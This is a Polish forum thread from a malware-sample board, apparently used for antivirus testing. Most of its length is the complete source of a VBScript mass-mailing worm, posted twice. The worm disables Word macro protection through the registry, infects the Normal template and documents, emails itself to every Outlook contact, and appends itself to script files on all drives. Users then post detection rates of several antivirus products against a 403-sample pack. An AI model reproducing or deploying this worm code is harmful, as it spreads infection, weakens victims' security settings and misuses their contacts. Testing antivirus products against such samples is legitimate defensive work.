Paczki, malware, złośliwe pliki, linki itp.

[virugen]

Yumao

Kod:

''VBS.MaoYu
''VBS.MaoYu by MaoYu(SG)
''to hell with Osama..

On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close

personal=ws.SpecialFolders("MyDocuments")

sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\MaoYu.vbs")

Set vw=sf.CreateTextFile("C:\MaoYu.sys")
vw.WriteLine "Attribute VB_Name = ""MaoYu"""
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FishProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 29 Then"
vw.WriteLine "MsgBox ""VBS.MaoYu. I love swimming. Hahahahaha"", vbInformation, ""For "" + Application.UserName"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\MaoYu.sys"""
vw.WriteLine "If Nor.Item(""MaoYu"").Name <> ""MaoYu"" Then"
vw.WriteLine "Doc(""MaoYu"").Export Drop"
vw.WriteLine "Nor.Import Drop"
vw.WriteLine "End If"
vw.WriteLine "If Doc.Item(""MaoYu"").Name <> ""MaoYu"" Then"
vw.WriteLine "Nor(""MaoYu"").Export Drop"
vw.WriteLine "Doc.Import Drop"
vw.WriteLine "ActiveDocument.Save"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub FishProtect()"
vw.WriteLine "With Options"
vw.WriteLine ".ConfirmConversions = False"
vw.WriteLine ".VirusProtection = False"
vw.WriteLine ".SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.WriteLine "End Sub"
vw.Close

lecteur()

ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"

Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count

tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."

Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "I am MaoYu.. also known as cAtfish in chinese.. read the attachment to know more about me!"
body = body & VbCrLf & ""
body = body & VbCrLf & "    See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next


Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc": srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
If Doc.Item("MaoYu").Name <> "MaoYu" Then
    Doc.Import ("C:\MaoYu.sys")
    wrd.ActiveDocument.Save
    End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit

Sub lecteur()
On Error Resume Next
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub

Sub infecte(dossier)
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
    Set cot=sf.OpenTextFile(f1.path, 1, False)
    If cot.ReadLine <> "''VBS.MaoYu" then
    cot.Close
    Set cot=sf.OpenTextFile(f1.path, 1, False)
    vbsorg=cot.ReadAll()
    cot.Close
    Set inf=sf.OpenTextFile(f1.path,2,True)
    inf.WriteLine "''VBS.MaoYu"
    inf.Write(vbsorg)
    inf.WriteLine ""
    inf.WriteLine virus
    inf.Close
    End If
End If
Next
End Sub

Sub liste(dossier)
On Error Resume Next
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
''VBS.MaoYu by MaoYu(SG)
''to hell with Osama..

On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close

personal=ws.SpecialFolders("MyDocuments")

sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\MaoYu.vbs")

Set vw=sf.CreateTextFile("C:\MaoYu.sys")
vw.WriteLine "Attribute VB_Name = ""MaoYu"""
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FishProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 29 Then"
vw.WriteLine "MsgBox ""VBS.MaoYu. I love swimming. Hahahahaha"", vbInformation, ""For "" + Application.UserName"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\MaoYu.sys"""
vw.WriteLine "If Nor.Item(""MaoYu"").Name <> ""MaoYu"" Then"
vw.WriteLine "Doc(""MaoYu"").Export Drop"
vw.WriteLine "Nor.Import Drop"
vw.WriteLine "End If"
vw.WriteLine "If Doc.Item(""MaoYu"").Name <> ""MaoYu"" Then"
vw.WriteLine "Nor(""MaoYu"").Export Drop"
vw.WriteLine "Doc.Import Drop"
vw.WriteLine "ActiveDocument.Save"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
vw.WriteLine "Sub FishProtect()"
vw.WriteLine "With Options"
vw.WriteLine ".ConfirmConversions = False"
vw.WriteLine ".VirusProtection = False"
vw.WriteLine ".SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.WriteLine "End Sub"
vw.Close

lecteur()

ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"

Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count

tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."

Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "I am MaoYu.. also known as cAtfish in chinese.. read the attachment to know more about me!"
body = body & VbCrLf & ""
body = body & VbCrLf & "    See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next


Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc": srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
If Doc.Item("MaoYu").Name <> "MaoYu" Then
    Doc.Import ("C:\MaoYu.sys")
    wrd.ActiveDocument.Save
    End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit

Sub lecteur()
On Error Resume Next
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub

Sub infecte(dossier)
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
    Set cot=sf.OpenTextFile(f1.path, 1, False)
    If cot.ReadLine <> "''VBS.MaoYu" then
    cot.Close
    Set cot=sf.OpenTextFile(f1.path, 1, False)
    vbsorg=cot.ReadAll()
    cot.Close
    Set inf=sf.OpenTextFile(f1.path,2,True)
    inf.WriteLine "''VBS.MaoYu"
    inf.Write(vbsorg)
    inf.WriteLine ""
    inf.WriteLine virus
    inf.Close
    End If
End If
Next
End Sub

Sub liste(dossier)
On Error Resume Next
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub

---

Dodano: 18 lip 2011 19:40

Paczka

Treść widoczna jedynie dla zarejestrowanych użytkowników

hasło: sg

[tachion]

FIS 2012
351/403 87%

[ananael]

ESET364/403 (90,3%)

[KaMiL]

Może ktoś sprawdzić FIS-a na dzisiejszych próbkach?

[tachion]

akurat trafiles
fis 2012
Lock Em All zaden nie jest wykryty,uruchomienie1.reset systemu2.zablokowanie systemu wyskoczylo jakies okienko po rusku 3. runtime error
falszywy skaner - wykryty
trojan gozi - nie wykryty,uruchomienie reset systemu i ćma tylko kursor pozostal (poprawka wstal system ale po dlugim okresie)
trojan sinowal - wykryty
very danger - wykrytylink - nie chce wejsc na wirtualu ani na opere ani na explorerze

[KaMiL]

Uuuu, a masz możliwość sprawdzić Mamutu?

[Piotrex44]

Może ktoś sprawdzić FIS-a na dzisiejszych próbkach?

mam trochę czasu więc jak chcesz mogę FIS-a sprawdzić na najświeższej paczce od Tommy tzn. skan a to co zastawi uruchamiane

---

Dodano: 18 lip 2011 21:26

Uuuu, a masz możliwość sprawdzić Mamutu?

no chyba że inna opcja

[KaMiL]

Dzięki
Tylko ustaw zaaw. heurestykę i Deepguarda (monitorowanie)

[Piotrex44]

Dzięki
Tylko ustaw zaaw. heurestykę i Deepguarda (monitorowanie)

ok tylko to trochę potrwa

[KaMiL]

Spoko

[Piotrex44]

już 2 raz wysypał się podczas aktualizacji

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

jednak będę musiał pobrać nową wersję

[KaMiL]

Wysypal sie podczas aktualizacji wersji programu, czy sygnatur?

[Piotrex44]

aktualizacji programu bo miałem jeszcze starą beta

[KaMiL]

Też mialem ten problem. Trzeba zglosic do F-Secure. Tez musialem instalowac od nowa.

[Piotrex44]

Też mialem ten problem. Trzeba zglosic do F-Secure. Tez musialem instalowac od nowa.

tylko że nie mam pojęcia jak mogę pobrać tego instalatora

[KaMiL]

Zaraz zapodam link. Mam nadzieję, że masz klucz?

//Po usunięciu odpalasz to

[Aby zobaczyć linki, zarejestruj się tutaj]

Restart i instalujesz

[Aby zobaczyć linki, zarejestruj się tutaj]

[Piotrex44]

kluczyk mam..
dzięki za info i dopiero teraz zobaczyłem że miałem e-mail od nich z linkami

no i próbowałem instalować ze starego instalatora i nie wiem czemu nie chciało pójść bo w końcu pliki pobiera online.

[andrzej76]

CIS 2011 - 360/403 (89,3%)

CIS 2011 + MBAM PRO - 390/403 (96,8%)

[Piotrex44]

FIS 2012 (403 Malware by Tommy)

[Aby zobaczyć linki, zarejestruj się tutaj]

6 zagrożeń ostatnich nie uruchomiłem bo zamuliło mi virtuala

---

Dodano: 19 lip 2011 02:53

Emsisoft A-M (403 Malware by Tommy)

[Aby zobaczyć linki, zarejestruj się tutaj]

[KaMiL]

Dzięki
Tylko na przyszlosc po skanowaniu nie dawaj na automatyczne usuwanie, bo FIS czesto nie usuwa wirusow, wtedy musisz recznie je usunac.
Emsisoft bardzo dobrze.